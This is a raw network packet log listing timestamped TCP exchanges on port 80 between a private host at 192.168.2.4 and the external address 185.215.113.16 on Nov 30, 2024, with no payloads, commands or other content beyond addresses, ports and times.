Nov 30, 2024 04:06:19.897964001 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.898008108 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.898480892 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.898494959 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.898531914 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.899452925 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.899498940 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.899636030 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.899688005 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.900331020 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.900376081 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.900479078 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.900522947 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.901138067 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.901185036 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.901304007 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.901348114 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.902010918 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.902061939 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.902168036 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.902213097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.903006077 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.903054953 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.903197050 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.903244019 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.903851986 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.903896093 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.903934002 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.903947115 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.903956890 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.903984070 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.904020071 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.904700041 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.904748917 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.904812098 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.904860020 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.905616999 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.905721903 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.905770063 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.906511068 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.906550884 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.906625986 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.906677961 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.907428980 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.907490015 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.907538891 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.907588959 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.911499023 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.911513090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.911525011 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.911540985 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.911550999 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.911581993 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.911645889 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.911658049 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.911695957 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:19.912121058 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:19.912312031 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.075212002 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.075241089 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.075274944 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.075305939 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.075668097 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.075711966 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.075747013 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.075793982 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.076522112 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.076565981 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.076637983 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.076679945 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.077476978 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.077516079 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.077578068 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.077619076 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.078345060 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.078396082 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.078520060 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.078562021 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.079257011 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.079298973 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.079345942 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.079389095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.080188990 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.080234051 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.080346107 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.080396891 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.081053972 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.081094980 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.081166983 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.081207037 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.081947088 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.081985950 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.082045078 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.082086086 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.082865000 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.082907915 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.082942963 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.082978010 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.083781004 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.083831072 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.083920002 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.084122896 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.084697008 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.084741116 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.084813118 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.084861994 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.085597992 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.085639000 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.085721016 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.085771084 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.086492062 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.086555004 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.086592913 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.086636066 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.087424040 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.087474108 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.087532043 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.087574005 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.088342905 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.088386059 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.088422060 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.088464022 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.089231968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.089276075 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.089338064 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.089385033 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.090121031 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.090163946 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.090231895 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.090280056 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.091034889 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.091074944 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.091135025 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.091176033 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.091947079 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.091995955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.092103958 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.092139959 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.093029976 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.093079090 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.093117952 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.093157053 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.093760014 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.093803883 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.093863964 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.093904018 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.094674110 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.094713926 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.094779968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.094824076 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.095617056 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.095663071 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.095757961 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.095798016 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.096503019 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.096546888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.096597910 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.096651077 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.097389936 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.097434044 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.097574949 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.097614050 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.098328114 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.098375082 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.098433971 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.098472118 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.099225998 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.099278927 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.099397898 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.099447012 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.100125074 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.100167990 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.100228071 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.100286007 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.101159096 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.101197004 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.101325989 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.101366997 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.101939917 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.101991892 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.102047920 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.102098942 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.102864027 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.102931976 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.102936983 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.102974892 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.103765011 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.103806973 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.103874922 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.103913069 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.104675055 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.104723930 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.104794025 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.104840040 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.105596066 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.105637074 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.105746984 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.105786085 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.106477976 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.106525898 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.106622934 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.106663942 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.107393980 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.107445955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.107505083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.107547998 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.108325005 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.108367920 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.108436108 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.108479977 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.109213114 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.109253883 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.109313965 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.109355927 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.110121965 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.110166073 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.110269070 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.110312939 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.111051083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.111092091 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.111213923 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.111258984 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.111938953 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.111982107 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.112097979 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.112140894 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.112905979 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.112946033 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.112999916 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.113040924 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.113755941 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.113800049 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.113868952 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.114012003 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.114665031 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.114710093 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.114778996 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.114818096 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.115576029 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.115624905 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.115698099 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.115731955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.116481066 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.116588116 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.116607904 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.116626024 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.117609024 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.117650986 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.117721081 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.117773056 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.118304968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.118350029 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.118411064 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.118448019 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.119196892 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.119239092 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.119393110 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.119431973 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.120115995 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.120157957 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.120184898 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.120225906 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.121026993 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.121068954 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.121093988 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.121150970 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.121941090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.121988058 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.122019053 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.122080088 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.122802019 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.122849941 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.285495043 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.285522938 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.285548925 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.285576105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.285757065 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.285813093 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.285849094 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.285890102 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.286643028 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.286693096 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.286742926 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.286791086 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.287558079 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.287601948 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.287765026 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.287817001 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.288490057 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.288530111 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.288628101 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.288667917 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.289383888 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.289432049 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.289486885 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.289530993 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.290297031 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.290338993 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.290370941 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.290414095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.291230917 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.291274071 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.291359901 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.291400909 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.292108059 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.292155981 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.292236090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.292282104 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.293016911 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.293065071 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.293138027 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.293180943 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.293914080 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.293956995 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.294024944 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.294064045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.294816971 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.294858932 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.294929028 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.294970036 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.295753002 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.295794964 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.295844078 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.295905113 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.296648026 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.296705961 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.296741962 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.296776056 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.297558069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.297599077 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.297621965 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.297657967 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.298477888 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.298521042 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.298572063 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.298610926 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.299382925 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.299433947 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.299474001 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.299527884 CET	49782	80	192.168.2.4	185.215.113.16
